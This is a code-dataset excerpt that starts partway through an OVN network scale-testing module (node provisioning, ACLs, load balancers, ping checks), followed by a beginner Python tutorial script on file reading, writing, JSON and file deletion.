self.enable_trim_on_compaction()\n self.set_northd_threads(cluster_cfg.northd_threads)\n\n def set_northd_threads(self, n_threads):\n log.info(f'Configuring northd to use {n_threads} threads')\n for container in self.db_containers:\n self.phys_node.run(\n f'podman exec {container} ovn-appctl -t '\n f'ovn-northd parallel-build/set-n-threads '\n f'{n_threads}'\n )\n\n def set_raft_election_timeout(self, timeout_s):\n for timeout in range(1000, (timeout_s + 1) * 1000, 1000):\n log.info(f'Setting RAFT election timeout to {timeout}ms')\n self.run(\n cmd=f'ovs-appctl -t '\n f'/run/ovn/ovnnb_db.ctl cluster/change-election-timer '\n f'OVN_Northbound {timeout}'\n )\n self.run(\n cmd=f'ovs-appctl -t '\n f'/run/ovn/ovnsb_db.ctl cluster/change-election-timer '\n f'OVN_Southbound {timeout}'\n )\n time.sleep(1)\n\n def enable_trim_on_compaction(self):\n log.info('Setting DB trim-on-compaction')\n for db_container in self.db_containers:\n self.phys_node.run(\n f'podman exec {db_container} ovs-appctl -t '\n f'/run/ovn/ovnnb_db.ctl '\n f'ovsdb-server/memory-trim-on-compaction on'\n )\n self.phys_node.run(\n f'podman exec {db_container} ovs-appctl -t '\n f'/run/ovn/ovnsb_db.ctl '\n f'ovsdb-server/memory-trim-on-compaction on'\n )\n for relay_container in self.relay_containers:\n self.phys_node.run(\n f'podman exec {relay_container} ovs-appctl -t '\n f'/run/ovn/ovnsb_db.ctl '\n f'ovsdb-server/memory-trim-on-compaction on'\n )\n\n def get_connection_string(self, cluster_cfg, port):\n protocol = \"ssl\" if cluster_cfg.enable_ssl else \"tcp\"\n ip = self.mgmt_ip\n num_conns = 3 if cluster_cfg.clustered_db else 1\n conns = [f\"{protocol}:{ip + idx}:{port}\" for idx in range(num_conns)]\n return \",\".join(conns)\n\n def central_containers(self):\n return self.db_containers\n\n\nclass WorkerNode(Node):\n def __init__(\n self,\n phys_node,\n container,\n mgmt_net,\n mgmt_ip,\n int_net,\n ext_net,\n gw_net,\n unique_id,\n ):\n super(WorkerNode, self).__init__(\n phys_node, container, mgmt_net, mgmt_ip\n )\n self.int_net = int_net\n self.ext_net = ext_net\n self.gw_net = gw_net\n self.id = unique_id\n self.switch = None\n self.gw_router = None\n self.ext_switch = None\n self.lports = []\n self.next_lport_index = 0\n self.vsctl = None\n\n def start(self, cluster_cfg):\n self.vsctl = ovn_utils.OvsVsctl(\n self,\n self.get_connection_string(cluster_cfg, 6640),\n cluster_cfg.db_inactivity_probe // 1000,\n )\n\n @ovn_stats.timeit\n def connect(self, cluster_cfg):\n log.info(\n f'Connecting worker {self.container}: '\n f'ovn-remote = {cluster_cfg.node_remote}'\n )\n self.vsctl.set_global_external_id(\n 'ovn-remote', f'{cluster_cfg.node_remote}'\n )\n\n def configure_localnet(self, physical_net):\n log.info(f'Creating localnet on {self.container}')\n self.vsctl.set_global_external_id(\n 'ovn-bridge-mappings', f'{physical_net}:br-ex'\n )\n\n def configure(self, physical_net):\n self.configure_localnet(physical_net)\n phys_ctl = ovn_utils.PhysCtl(self)\n phys_ctl.external_host_provision(\n ip=self.ext_net.reverse(2), gw=self.ext_net.reverse()\n )\n\n @ovn_stats.timeit\n def wait(self, sbctl, timeout_s):\n for _ in range(timeout_s * 10):\n if sbctl.chassis_bound(self.container):\n return\n time.sleep(0.1)\n raise ovn_exceptions.OvnChassisTimeoutException()\n\n @ovn_stats.timeit\n def provision(self, cluster):\n self.connect(cluster.cluster_cfg)\n self.wait(cluster.sbctl, cluster.cluster_cfg.node_timeout_s)\n\n # Create a node switch and connect it to the cluster router.\n self.switch = cluster.nbctl.ls_add(\n 
f'lswitch-{self.container}', net_s=self.int_net\n )\n lrp_name = f'rtr-to-node-{self.container}'\n ls_rp_name = f'node-to-rtr-{self.container}'\n self.rp = cluster.nbctl.lr_port_add(\n cluster.router, lrp_name, RandMac(), self.int_net.reverse()\n )\n self.ls_rp = cluster.nbctl.ls_port_add(\n self.switch, ls_rp_name, self.rp\n )\n\n # Make the lrp as distributed gateway router port.\n cluster.nbctl.lr_port_set_gw_chassis(self.rp, self.container)\n\n # Create a gw router and connect it to the cluster join switch.\n self.gw_router = cluster.nbctl.lr_add(f'gwrouter-{self.container}')\n cluster.nbctl.lr_set_options(\n self.gw_router,\n {\n 'always_learn_from_arp_request': 'false',\n 'dynamic_neigh_routers': 'true',\n 'chassis': self.container,\n 'lb_force_snat_ip': 'router_ip',\n 'snat-ct-zone': 0,\n },\n )\n join_grp_name = f'gw-to-join-{self.container}'\n join_ls_grp_name = f'join-to-gw-{self.container}'\n\n gr_gw = self.gw_net.reverse(self.id + 2)\n self.gw_rp = cluster.nbctl.lr_port_add(\n self.gw_router, join_grp_name, RandMac(), gr_gw\n )\n self.join_gw_rp = cluster.nbctl.ls_port_add(\n cluster.join_switch, join_ls_grp_name, self.gw_rp\n )\n\n # Create an external switch connecting the gateway router to the\n # physnet.\n self.ext_switch = cluster.nbctl.ls_add(\n f'ext-{self.container}', net_s=self.ext_net\n )\n ext_lrp_name = f'gw-to-ext-{self.container}'\n ext_ls_rp_name = f'ext-to-gw-{self.container}'\n self.ext_rp = cluster.nbctl.lr_port_add(\n self.gw_router, ext_lrp_name, RandMac(), self.ext_net.reverse()\n )\n self.ext_gw_rp = cluster.nbctl.ls_port_add(\n self.ext_switch, ext_ls_rp_name, self.ext_rp\n )\n\n # Configure physnet.\n self.physnet_port = cluster.nbctl.ls_port_add(\n self.ext_switch,\n f'provnet-{self.container}',\n localnet=True,\n )\n cluster.nbctl.ls_port_set_set_type(self.physnet_port, 'localnet')\n cluster.nbctl.ls_port_set_set_options(\n self.physnet_port, f'network_name={cluster.brex_cfg.physical_net}'\n )\n\n # Route for traffic entering the cluster.\n cluster.nbctl.route_add(\n self.gw_router, cluster.net, self.gw_net.reverse()\n )\n\n # Default route to get out of cluster via physnet.\n cluster.nbctl.route_add(\n self.gw_router,\n ovn_utils.DualStackSubnet(\n netaddr.IPNetwork(\"0.0.0.0/0\"), netaddr.IPNetwork(\"::/0\")\n ),\n self.ext_net.reverse(2),\n )\n\n # Route for traffic that needs to exit the cluster\n # (via gw router).\n cluster.nbctl.route_add(\n cluster.router, self.int_net, gr_gw, policy=\"src-ip\"\n )\n\n # SNAT traffic leaving the cluster.\n cluster.nbctl.nat_add(self.gw_router, gr_gw, cluster.net)\n\n @ovn_stats.timeit\n def provision_port(self, cluster, passive=False):\n name = f'lp-{self.id}-{self.next_lport_index}'\n\n log.info(f'Creating lport {name}')\n lport = cluster.nbctl.ls_port_add(\n self.switch,\n name,\n mac=str(RandMac()),\n ip=self.int_net.forward(self.next_lport_index + 1),\n gw=self.int_net.reverse(),\n ext_gw=self.ext_net.reverse(2),\n metadata=self,\n passive=passive,\n security=True,\n )\n\n self.lports.append(lport)\n self.next_lport_index += 1\n return lport\n\n @ovn_stats.timeit\n def unprovision_port(self, cluster, port):\n cluster.nbctl.ls_port_del(port)\n self.unbind_port(port)\n self.lports.remove(port)\n\n @ovn_stats.timeit\n def provision_load_balancers(self, cluster, ports, global_cfg):\n # Add one port IP as a backend to the cluster load balancer.\n if global_cfg.run_ipv4:\n port_ips = (\n f'{port.ip}:{DEFAULT_BACKEND_PORT}'\n for port in ports\n if port.ip is not None\n )\n cluster_vips = 
cluster.cluster_cfg.vips.keys()\n            cluster.load_balancer.add_backends_to_vip(port_ips, cluster_vips)\n            cluster.load_balancer.add_to_switches([self.switch.name])\n            cluster.load_balancer.add_to_routers([self.gw_router.name])\n\n        if global_cfg.run_ipv6:\n            port_ips6 = (\n                f'[{port.ip6}]:{DEFAULT_BACKEND_PORT}'\n                for port in ports\n                if port.ip6 is not None\n            )\n            cluster_vips6 = cluster.cluster_cfg.vips6.keys()\n            cluster.load_balancer6.add_backends_to_vip(\n                port_ips6, cluster_vips6\n            )\n            cluster.load_balancer6.add_to_switches([self.switch.name])\n            cluster.load_balancer6.add_to_routers([self.gw_router.name])\n\n        # GW Load balancer has no VIPs/backends configured on it, since\n        # this load balancer is used for hostnetwork services. We're not\n        # using those right now so the load balancer is empty.\n        if global_cfg.run_ipv4:\n            self.gw_load_balancer = lb.OvnLoadBalancer(\n                f'lb-{self.gw_router.name}', cluster.nbctl\n            )\n            self.gw_load_balancer.add_to_routers([self.gw_router.name])\n        if global_cfg.run_ipv6:\n            self.gw_load_balancer6 = lb.OvnLoadBalancer(\n                f'lb-{self.gw_router.name}6', cluster.nbctl\n            )\n            self.gw_load_balancer6.add_to_routers([self.gw_router.name])\n\n    @ovn_stats.timeit\n    def bind_port(self, port):\n        log.info(f'Binding lport {port.name} on {self.container}')\n        self.vsctl.add_port(port, 'br-int', internal=True, ifaceid=port.name)\n        # Skip creating a netns for \"passive\" ports, we won't be sending\n        # traffic on those.\n        if not port.passive:\n            self.vsctl.bind_vm_port(port)\n\n    @ovn_stats.timeit\n    def unbind_port(self, port):\n        if not port.passive:\n            self.vsctl.unbind_vm_port(port)\n        self.vsctl.del_port(port)\n\n    def provision_ports(self, cluster, n_ports, passive=False):\n        ports = [self.provision_port(cluster, passive) for i in range(n_ports)]\n        for port in ports:\n            self.bind_port(port)\n        return ports\n\n    def run_ping(self, cluster, src, dest):\n        log.info(f'Pinging from {src} to {dest}')\n\n        # FIXME\n        # iputils is inconsistent when working with sub-second timeouts.\n        # The behavior of ping's \"-W\" option changed a couple of times already.\n        # https://github.com/iputils/iputils/issues/290\n        # Until that's stable use \"timeout 0.1s\" instead.\n        cmd = f'ip netns exec {src} timeout 0.1s ping -q -c 1 {dest}'\n        start_time = datetime.now()\n        while True:\n            try:\n                self.run(cmd=cmd, raise_on_error=True)\n                break\n            except ovn_exceptions.SSHError:\n                pass\n\n            duration = (datetime.now() - start_time).seconds\n            if duration > cluster.cluster_cfg.node_timeout_s:\n                log.error(\n                    f'Timeout waiting for {src} ' f'to be able to ping {dest}'\n                )\n                raise ovn_exceptions.OvnPingTimeoutException()\n\n    @ovn_stats.timeit\n    def ping_port(self, cluster, port, dest):\n        self.run_ping(cluster, port.name, dest)\n\n    @ovn_stats.timeit\n    def ping_external(self, cluster, port):\n        if port.ip:\n            self.run_ping(cluster, 'ext-ns', port.ip)\n        if port.ip6:\n            self.run_ping(cluster, 'ext-ns', port.ip6)\n\n    def ping_ports(self, cluster, ports):\n        for port in ports:\n            if port.ip:\n                self.ping_port(cluster, port, dest=port.ext_gw)\n            if port.ip6:\n                self.ping_port(cluster, port, dest=port.ext_gw6)\n\n    def get_connection_string(self, cluster_cfg, port):\n        protocol = \"ssl\" if cluster_cfg.enable_ssl else \"tcp\"\n        offset = 0\n        offset += 3 if cluster_cfg.clustered_db else 1\n        offset += cluster_cfg.n_relays\n        return f\"{protocol}:{self.mgmt_ip + offset}:{port}\"\n\n\nACL_DEFAULT_DENY_PRIO = 1\nACL_DEFAULT_ALLOW_ARP_PRIO = 2\nACL_NETPOL_ALLOW_PRIO = 3\nDEFAULT_NS_VIP_SUBNET = netaddr.IPNetwork('30.0.0.0/16')\nDEFAULT_NS_VIP_SUBNET6 = 
netaddr.IPNetwork('30::/32')\nDEFAULT_VIP_PORT = 80\nDEFAULT_BACKEND_PORT = 8080\n\n\nclass Namespace(object):\n    def __init__(self, cluster, name, global_cfg):\n        self.cluster = cluster\n        self.nbctl = cluster.nbctl\n        self.ports = []\n        self.enforcing = False\n        self.pg_def_deny_igr = self.nbctl.port_group_create(\n            f'pg_deny_igr_{name}'\n        )\n        self.pg_def_deny_egr = self.nbctl.port_group_create(\n            f'pg_deny_egr_{name}'\n        )\n        self.pg = self.nbctl.port_group_create(f'pg_{name}')\n        self.addr_set4 = (\n            self.nbctl.address_set_create(f'as_{name}')\n            if global_cfg.run_ipv4\n            else None\n        )\n        self.addr_set6 = (\n            self.nbctl.address_set_create(f'as6_{name}')\n            if global_cfg.run_ipv6\n            else None\n        )\n        self.sub_as = []\n        self.sub_pg = []\n        self.load_balancer = None\n        self.cluster.n_ns += 1\n        self.name = name\n\n    @ovn_stats.timeit\n    def add_ports(self, ports):\n        self.ports.extend(ports)\n        # Always add port IPs to the address set but not to the PGs.\n        # Simulate what OpenShift does, which is: create the port groups\n        # when the first network policy is applied.\n        if self.addr_set4:\n            self.nbctl.address_set_add_addrs(\n                self.addr_set4, [str(p.ip) for p in ports]\n            )\n        if self.addr_set6:\n            self.nbctl.address_set_add_addrs(\n                self.addr_set6, [str(p.ip6) for p in ports]\n            )\n        if self.enforcing:\n            self.nbctl.port_group_add_ports(self.pg_def_deny_igr, ports)\n            self.nbctl.port_group_add_ports(self.pg_def_deny_egr, ports)\n            self.nbctl.port_group_add_ports(self.pg, ports)\n\n    def unprovision(self):\n        # ACLs are garbage collected by OVSDB as soon as all the records\n        # referencing them are removed.\n        self.cluster.unprovision_ports(self.ports)\n        self.nbctl.port_group_del(self.pg_def_deny_igr)\n        self.nbctl.port_group_del(self.pg_def_deny_egr)\n        self.nbctl.port_group_del(self.pg)\n        if self.addr_set4:\n            self.nbctl.address_set_del(self.addr_set4)\n        if self.addr_set6:\n            self.nbctl.address_set_del(self.addr_set6)\n        for pg in self.sub_pg:\n            self.nbctl.port_group_del(pg)\n        for addr_set in self.sub_as:\n            self.nbctl.address_set_del(addr_set)\n\n    def unprovision_ports(self, ports):\n        '''Unprovision a subset of ports in the namespace without having to\n        unprovision the entire namespace or any of its network policies.'''\n\n        for port in ports:\n            self.ports.remove(port)\n\n        self.cluster.unprovision_ports(ports)\n\n    def enforce(self):\n        if self.enforcing:\n            return\n        self.enforcing = True\n        self.nbctl.port_group_add_ports(self.pg_def_deny_igr, self.ports)\n        self.nbctl.port_group_add_ports(self.pg_def_deny_egr, self.ports)\n        self.nbctl.port_group_add_ports(self.pg, self.ports)\n\n    def create_sub_ns(self, ports, global_cfg):\n        n_sub_pgs = len(self.sub_pg)\n        suffix = f'{self.name}_{n_sub_pgs}'\n        pg = self.nbctl.port_group_create(f'sub_pg_{suffix}')\n        self.nbctl.port_group_add_ports(pg, ports)\n        self.sub_pg.append(pg)\n        if global_cfg.run_ipv4:\n            addr_set = self.nbctl.address_set_create(f'sub_as_{suffix}')\n            self.nbctl.address_set_add_addrs(\n                addr_set, [str(p.ip) for p in ports]\n            )\n            self.sub_as.append(addr_set)\n        if global_cfg.run_ipv6:\n            addr_set = self.nbctl.address_set_create(f'sub_as_{suffix}6')\n            self.nbctl.address_set_add_addrs(\n                addr_set, [str(p.ip6) for p in ports]\n            )\n            self.sub_as.append(addr_set)\n        return n_sub_pgs\n\n    @ovn_stats.timeit\n    def default_deny(self, family):\n        self.enforce()\n\n        addr_set = getattr(self, f'addr_set{family}').name\n        self.nbctl.acl_add(\n            self.pg_def_deny_igr.name,\n            'to-lport',\n            ACL_DEFAULT_DENY_PRIO,\n            'port-group',\n            f'ip{family}.src == \\\\${addr_set} && '\n            f'outport == @{self.pg_def_deny_igr.name}',\n            'drop',\n        )\n        
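# Illustrative example of the rendered match: for family=4 in a namespace\n        # named 'ns', the ACL above matches 'ip4.src == $as_ns && outport ==\n        # @pg_deny_igr_ns' (names here are hypothetical).\n        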
self.nbctl.acl_add(\n            self.pg_def_deny_egr.name,\n            'to-lport',\n            ACL_DEFAULT_DENY_PRIO,\n            'port-group',\n            f'ip{family}.dst == \\\\${addr_set} && '\n            f'inport == @{self.pg_def_deny_egr.name}',\n            'drop',\n        )\n        self.nbctl.acl_add(\n            self.pg_def_deny_igr.name,\n            'to-lport',\n            ACL_DEFAULT_ALLOW_ARP_PRIO,\n            'port-group',\n            f'outport == @{self.pg_def_deny_igr.name} && arp',\n            'allow',\n        )\n        self.nbctl.acl_add(\n            self.pg_def_deny_egr.name,\n            'to-lport',\n            ACL_DEFAULT_ALLOW_ARP_PRIO,\n            'port-group',\n            f'inport == @{self.pg_def_deny_egr.name} && arp',\n            'allow',\n        )\n\n    @ovn_stats.timeit\n    def allow_within_namespace(self, family):\n        self.enforce()\n\n        addr_set = getattr(self, f'addr_set{family}').name\n        self.nbctl.acl_add(\n            self.pg.name,\n            'to-lport',\n            ACL_NETPOL_ALLOW_PRIO,\n            'port-group',\n            f'ip{family}.src == \\\\${addr_set} && outport == @{self.pg.name}',\n            'allow-related',\n        )\n        self.nbctl.acl_add(\n            self.pg.name,\n            'to-lport',\n            ACL_NETPOL_ALLOW_PRIO,\n            'port-group',\n            f'ip{family}.dst == \\\\${addr_set} && inport == @{self.pg.name}',\n            'allow-related',\n        )\n\n    @ovn_stats.timeit\n    def allow_cross_namespace(self, ns, family):\n        self.enforce()\n\n        addr_set = getattr(self, f'addr_set{family}').name\n        self.nbctl.acl_add(\n            self.pg.name,\n            'to-lport',\n            ACL_NETPOL_ALLOW_PRIO,\n            'port-group',\n            f'ip{family}.src == \\\\${addr_set} && outport == @{ns.pg.name}',\n            'allow-related',\n        )\n        ns_addr_set = getattr(ns, f'addr_set{family}').name\n        self.nbctl.acl_add(\n            self.pg.name,\n            'to-lport',\n            ACL_NETPOL_ALLOW_PRIO,\n            'port-group',\n            f'ip{family}.dst == \\\\${ns_addr_set} && inport == @{self.pg.name}',\n            'allow-related',\n        )\n\n    @ovn_stats.timeit\n    def allow_sub_namespace(self, src, dst, family):\n        self.nbctl.acl_add(\n            self.pg.name,\n            'to-lport',\n            ACL_NETPOL_ALLOW_PRIO,\n            'port-group',\n            f'ip{family}.src == \\\\${self.sub_as[src].name} && '\n            f'outport == @{self.sub_pg[dst].name}',\n            'allow-related',\n        )\n        self.nbctl.acl_add(\n            self.pg.name,\n            'to-lport',\n            ACL_NETPOL_ALLOW_PRIO,\n            'port-group',\n            f'ip{family}.dst == \\\\${self.sub_as[dst].name} && '\n            f'inport == @{self.sub_pg[src].name}',\n            'allow-related',\n        )\n\n    @ovn_stats.timeit\n    def allow_from_external(\n        self, external_ips, include_ext_gw=False, family=4\n    ):\n        self.enforce()\n        # If requested, include the ext-gw of the first port in the namespace\n        # so we can check that this rule is enforced.\n        if include_ext_gw:\n            assert len(self.ports) > 0\n            if family == 4 and self.ports[0].ext_gw:\n                external_ips.append(self.ports[0].ext_gw)\n            elif family == 6 and self.ports[0].ext_gw6:\n                external_ips.append(self.ports[0].ext_gw6)\n        ips = [str(ip) for ip in external_ips]\n        self.nbctl.acl_add(\n            self.pg.name,\n            'to-lport',\n            ACL_NETPOL_ALLOW_PRIO,\n            'port-group',\n            f'ip{family}.src == {{{\",\".join(ips)}}} && '\n            f'outport == @{self.pg.name}',\n            'allow-related',\n        )\n\n    @ovn_stats.timeit\n    def check_enforcing_internal(self):\n        # \"Random\" check that first pod can reach last pod in the namespace.\n        if len(self.ports) > 1:\n            src = self.ports[0]\n            dst = self.ports[-1]\n            worker = src.metadata\n            if src.ip:\n                worker.ping_port(self.cluster, src, dst.ip)\n            if src.ip6:\n                worker.ping_port(self.cluster, src, dst.ip6)\n\n    @ovn_stats.timeit\n    def check_enforcing_external(self):\n        if len(self.ports) > 0:\n            dst = self.ports[0]\n            worker = dst.metadata\n            worker.ping_external(self.cluster, dst)\n\n    @ovn_stats.timeit\n    def check_enforcing_cross_ns(self, ns):\n        if len(self.ports) > 0 and len(ns.ports) > 0:\n            dst = ns.ports[0]\n            src = self.ports[0]\n            worker = src.metadata\n            if src.ip and dst.ip:\n                worker.ping_port(self.cluster, 
src, dst.ip)\n if src.ip6 and dst.ip6:\n worker.ping_port(self.cluster, src, dst.ip6)\n\n def create_load_balancer(self):\n self.load_balancer = lb.OvnLoadBalancer(f'lb_{self.name}', self.nbctl)\n\n @ovn_stats.timeit\n def provision_vips_to_load_balancers(self, backend_lists, version):\n vip_ns_subnet = DEFAULT_NS_VIP_SUBNET\n if version == 6:\n vip_ns_subnet = DEFAULT_NS_VIP_SUBNET6\n vip_net = vip_ns_subnet.next(self.cluster.n_ns)\n n_vips = len(self.load_balancer.vips.keys())\n vip_ip = vip_net.ip.__add__(n_vips + 1)\n\n if version == 6:\n vips = {\n f'[{vip_ip + i}]:{DEFAULT_VIP_PORT}': [\n f'[{p.ip6}]:{DEFAULT_BACKEND_PORT}' for p in ports\n ]\n for i, ports in enumerate(backend_lists)\n }\n self.load_balancer.add_vips(vips)\n else:\n vips = {\n f'{vip_ip + i}:{DEFAULT_VIP_PORT}': [\n f'{p.ip}:{DEFAULT_BACKEND_PORT}' for p in ports\n ]\n for i, ports in enumerate(backend_lists)\n }\n self.load_balancer.add_vips(vips)\n\n\nclass Cluster(object):\n def __init__(self, central_node, worker_nodes, cluster_cfg, brex_cfg):\n # In clustered mode use the first node for provisioning.\n self.central_node = central_node\n self.worker_nodes = worker_nodes\n self.cluster_cfg = cluster_cfg\n self.brex_cfg = brex_cfg\n self.nbctl = None\n self.sbctl = None\n self.net = cluster_cfg.cluster_net\n self.router = None\n self.load_balancer = None\n self.load_balancer6 = None\n self.join_switch = None\n self.last_selected_worker = 0\n self.n_ns = 0\n\n def start(self):\n self.central_node.start(self.cluster_cfg)\n nb_conn = self.central_node.get_connection_string(\n self.cluster_cfg, 6641\n )\n inactivity_probe = self.cluster_cfg.db_inactivity_probe // 1000\n self.nbctl = ovn_utils.OvnNbctl(\n self.central_node, nb_conn, inactivity_probe\n )\n\n sb_conn = self.central_node.get_connection_string(\n self.cluster_cfg, 6642\n )\n self.sbctl = ovn_utils.OvnSbctl(\n self.central_node, sb_conn, inactivity_probe\n )\n for w in self.worker_nodes:\n w.start(self.cluster_cfg)\n w.configure(self.brex_cfg.physical_net)\n\n self.nbctl.set_global(\n 'use_logical_dp_groups', self.cluster_cfg.logical_dp_groups\n )\n self.nbctl.set_global(\n 'northd_probe_interval', self.cluster_cfg.northd_probe_interval\n )\n self.nbctl.set_inactivity_probe(self.cluster_cfg.db_inactivity_probe)\n self.sbctl.set_inactivity_probe(self.cluster_cfg.db_inactivity_probe)\n\n def create_cluster_router(self, rtr_name):\n self.router = self.nbctl.lr_add(rtr_name)\n self.nbctl.lr_set_options(\n self.router,\n {\n 'always_learn_from_arp_request': 'false',\n },\n )\n\n def create_cluster_load_balancer(self, lb_name, global_cfg):\n if global_cfg.run_ipv4:\n self.load_balancer = lb.OvnLoadBalancer(\n lb_name, self.nbctl, self.cluster_cfg.vips\n )\n self.load_balancer.add_vips(self.cluster_cfg.static_vips)\n\n if global_cfg.run_ipv6:\n self.load_balancer6 = lb.OvnLoadBalancer(\n f'{lb_name}6', self.nbctl, self.cluster_cfg.vips6\n )\n self.load_balancer6.add_vips(self.cluster_cfg.static_vips6)\n\n def create_cluster_join_switch(self, sw_name):\n self.join_switch = self.nbctl.ls_add(\n sw_name, net_s=self.cluster_cfg.gw_net\n )\n\n self.join_rp = self.nbctl.lr_port_add(\n self.router,\n 'rtr-to-join',\n RandMac(),\n self.cluster_cfg.gw_net.reverse(),\n )\n self.join_ls_rp = self.nbctl.ls_port_add(\n self.join_switch, 'join-to-rtr', self.join_rp\n )\n\n def provision_ports(self, n_ports, passive=False):\n return [\n self.select_worker_for_port().provision_ports(self, 1, passive)[0]\n for _ in range(n_ports)\n ]\n\n def unprovision_ports(self, ports):\n for 
port in ports:\n            worker = port.metadata\n            worker.unprovision_port(self, port)\n\n    def ping_ports(self, ports):\n        ports_per_worker = defaultdict(list)\n        for p in ports:\n            ports_per_worker[p.metadata].append(p)\n        for w, ports in ports_per_worker.items():\n            w.ping_ports(self, ports)\n\n    @ovn_stats.timeit\n    def provision_vips_to_load_balancers(self, backend_lists):\n        n_vips = len(self.load_balancer.vips.keys())\n        vip_ip = self.cluster_cfg.vip_subnet.ip.__add__(n_vips + 1)\n\n        vips = {\n            f'{vip_ip + i}:{DEFAULT_VIP_PORT}': [\n                f'{p.ip}:{DEFAULT_BACKEND_PORT}' for p in ports\n            ]\n            for i, ports in enumerate(backend_lists)\n        }\n        self.load_balancer.add_vips(vips)\n\n    def unprovision_vips(self):\n        if self.load_balancer:\n            self.load_balancer.clear_vips()\n            self.load_balancer.add_vips(self.cluster_cfg.static_vips)\n        if self.load_balancer6:\n            self.load_balancer6.clear_vips()\n            self.load_balancer6.add_vips(self.cluster_cfg.static_vips6)\n\n    def select_worker_for_port(self):\n        self.last_selected_worker += 1\n        self.last_selected_worker %= len(self.worker_nodes)\n        return self.worker_nodes[self.last_selected_worker]\n\n    def provision_lb_group(self):\n        self.lb_group = lb.OvnLoadBalancerGroup('cluster-lb-group', self.nbctl)\n        for w in self.worker_nodes:\n            self.nbctl.ls_add_lbg(w.switch, self.lb_group.lbg)\n            self.nbctl.lr_add_lbg(w.gw_router, self.lb_group.lbg)\n\n    def provision_lb(self, lb):\n        log.info(f'Creating load balancer {lb.name}')\n        self.lb_group.add_lb(lb)\n","sub_path":"ovn-tester/ovn_workload.py","file_name":"ovn_workload.py","file_ext":"py","file_size_in_byte":29793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
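The per-family ACL helpers in the ovn_workload record above resolve addr_set4 or addr_set6 dynamically from the family argument; a minimal standalone sketch of the getattr pattern they rely on (the class and names here are illustrative, not part of ovn-tester):

# Build the attribute name at runtime and resolve it with getattr();
# an f-string alone would only produce the literal text of the name.
class _Ns:
    def __init__(self):
        self.addr_set4 = 'as_ns4'
        self.addr_set6 = 'as_ns6'

def deny_match(ns, family):
    addr_set = getattr(ns, f'addr_set{family}')
    return f'ip{family}.src == ${addr_set}'

assert deny_match(_Ns(), 4) == 'ip4.src == $as_ns4'
assert deny_match(_Ns(), 6) == 'ip6.src == $as_ns6'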
+{"seq_id":"208618907","text":"# Reading and writing files\n\nimport json\n\n# 1. Use the with statement: the file is closed automatically; without it you must call f.close()\n# It is good practice to use the with keyword when dealing with file objects. The advantage is that the file is\n# properly closed after its suite finishes, even if an exception is raised at some point. Using with is also much\n# shorter than writing equivalent try-finally blocks:\nworkfile = 'workfile'\nwith open(workfile) as f:\n    read_data = f.read()  # read() without size; read(size) reads everything by default\n    # print(read_data)\n# print(f.closed)\n\n# Methods of File Objects\n\n# 2. Read a single line:\n# with: closes the file automatically\n# To read a file’s contents, call f.read(size), which reads some quantity of data and returns it as a string (in text\n# mode) or bytes object (in binary mode). size is an optional numeric argument. When size is omitted or negative,\n# the entire contents of the file will be read and returned; it’s your problem if the file is twice as large as your\n# machine’s memory. Otherwise, at most size bytes are read and returned. If the end of the file has been reached,\n# f.read() will return an empty string ('').\nwith open(workfile) as f:\n    # f.read()\n    while read_data:\n        read_data = f.readline()\n        # print(read_data, end='')\n# For reading lines from a file, you can loop over the file object. This is memory efficient, fast, and leads to\n# simple code:\nf = open(workfile, 'r+')\nfor line in f:\n    print(line, end='')\nf.close()\n\n# 3. Read all lines:\n# If you want to read all the lines of a file in a list you can also use list(f) or f.readlines().\nf = open(workfile, 'r+')\n\ntext = f.readlines()\nprint('read all lines:' + str(text))\n\n# 4. Write data\n# f.write(string) writes the contents of string to the file, returning the number of characters written.\nwriteNum = f.write('This is a test\\n')\nprint('write num:' + str(writeNum))\n\n# 5. Read/write modes\n# The first argument is a string containing the filename. The second argument is another string containing a few\n# characters describing the way in which the file will be used. mode can be 'r' when the file will only be read,\n# 'w' for only writing (an existing file with the same name will be erased), and 'a' opens the file for appending;\n# any data written to the file is automatically added to the end. 'r+' opens the file for both reading and writing.\n# The mode argument is optional; 'r' will be assumed if it’s omitted.\n\n# f.tell() returns an integer giving the file object’s current position in the file represented as number of bytes\n# from the beginning of the file when in binary mode and an opaque number when in text mode.\nprint(f.tell())\n\n# 6. json\nprint(json.dumps([1, 'simple', 'list']))\n# dump directly to a file\n# Another variant of the dumps() function, called dump(), simply serializes the object to a text file. So if f is a\n# text file object opened for writing, we can do this:\njson.dump('json', f)\n# read json back from a file\nf1 = open('jsonFile', 'r')\nprint(json.load(f1))\n\n\n# 1 read files\n# \"r\" - Read - Default value. Opens a file for reading, error if the file does not exist\n# \"a\" - Append - Opens a file for appending, creates the file if it does not exist\n# \"w\" - Write - Opens a file for writing, creates the file if it does not exist\n# \"x\" - Create - Creates the specified file, returns an error if the file exists\n\n# In addition you can specify if the file should be handled as binary or text mode\n# \"t\" - Text - Default value. Text mode\n# \"b\" - Binary - Binary mode (e.g. images)\n\n\nf = open(\"jsonFile.txt\", \"r\")\nprint(f.read())\n\n# By default the read() method returns the whole text, but you can also specify how many characters you want to return:\nf = open(\"demofile.txt\", \"r\")\nprint(f.read(5))\n\n# 2 write files\n# Open the file \"demofile.txt\" and append content to the file:\nf = open(\"demofile.txt\", \"a\")\nf.write(\"Now the file has one more line!\")\n\n# Open the file \"demofile.txt\" and overwrite the content:\nf = open(\"demofile.txt\", \"w\")\nf.write(\"Woops! I have deleted the content!\")\n\n# Create a New File\n# To create a new file in Python, use the open() method, with one of the following parameters:\n# \"x\" - Create - will create a file, returns an error if the file exist\n# \"a\" - Append - will create a file if the specified file does not exist\n# \"w\" - Write - will create a file if the specified file does not exist\n# Create a file called \"myfile.txt\":\nf = open(\"myfile.txt\", \"x\")\n\n# Create a new file if it does not exist:\nf = open(\"myfile.txt\", \"w\")\n\n# Delete a File\nimport os\nos.remove(\"/data/a.log\")\n\nif os.path.exists(\"demofile.txt\"):\n    os.remove(\"demofile.txt\")\n\n# Delete Folder\nos.rmdir(\"myfolder\")","sub_path":"file/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
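The record above demonstrates json.dump() on an already-open handle; here is a hedged, self-contained round trip through a file for completeness (the file name is illustrative):

import json

data = {'numbers': [1, 2, 3], 'label': 'simple'}
with open('roundtrip.json', 'w') as f:
    json.dump(data, f)           # serialize straight to the text file
with open('roundtrip.json') as f:
    assert json.load(f) == data  # read it back unchanged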
